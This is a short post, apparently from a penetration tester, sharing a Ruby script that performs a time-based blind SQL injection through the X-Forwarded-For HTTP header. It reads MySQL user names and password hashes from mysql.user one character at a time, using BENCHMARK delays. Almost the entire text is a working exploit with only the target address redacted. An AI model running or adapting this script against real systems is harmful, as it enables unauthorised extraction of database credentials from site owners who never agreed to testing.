simple script i wrote during a pentest for a customer, nothing fancy just practical :D
#!/usr/bin/env ruby
# network penetration test (10/2011)
# http header blind sql injection
require "net/http"
require "uri"
STDOUT.sync = true
@url = URI.parse("http://xxx.xxxx.xxx")
def fuxx(data)
req = Net::HTTP::Get.new(@url.path)
req.add_field("X-Forwarded-For", "#{data}")
t_start = Time.now.to_i
res = Net::HTTP.new(@url.host, @url.port).start do |http|
http.request(req)
end
t_stop = Time.now.to_i
timer = t_stop - t_start
return timer
end
(1..58).each { |i|
(32..126).each { |ch|
data = "1' AND (SELECT IF(ASCII(SUBSTRING((SELECT CONCAT(user,0x3a,password) FROM mysql.user LIMIT 2,1),#{i},1))>#{ch},NULL,BENCHMARK(1500000,MD5(CHAR(118)))))>'0"
if (fuxx(data) > 4)
print ch.chr
break
end
}
}
